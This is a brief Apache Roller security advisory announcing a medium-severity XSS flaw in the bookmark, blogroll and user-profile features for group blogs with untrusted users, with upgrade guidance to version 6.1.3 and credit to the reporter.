The Apache Roller project would like to announce a vulnerability that may impact Roller installations that allow group blogging with untrusted users.
Severity: Medium (only impacts group blogging sites with untrusted users) Description: Insufficient input validation and sanitation in Bookmark, Bookmark Folder (Blogroll), and User Profile features in all versions of Apache Roller on all platforms allows an authenticated user to perform an XSS attack. Mitigation: If you are not running a group blog, then no mitigation is needed. If you are running a group blog and you do not have Roller configured for untrusted users, then you need to do nothing because you trust your users to author raw HTML and other web content. But, if you are running a group blog and you do not trust your users to author HTML, CSS and JavaScript then you should upgrade to Roller 6.1.3. Roller 6.1.3 is available for download here: https://roller.apache.org/downloads/downloads.html Apache Roller would like to thank Jacob Hazak for reporting this vulnerability.
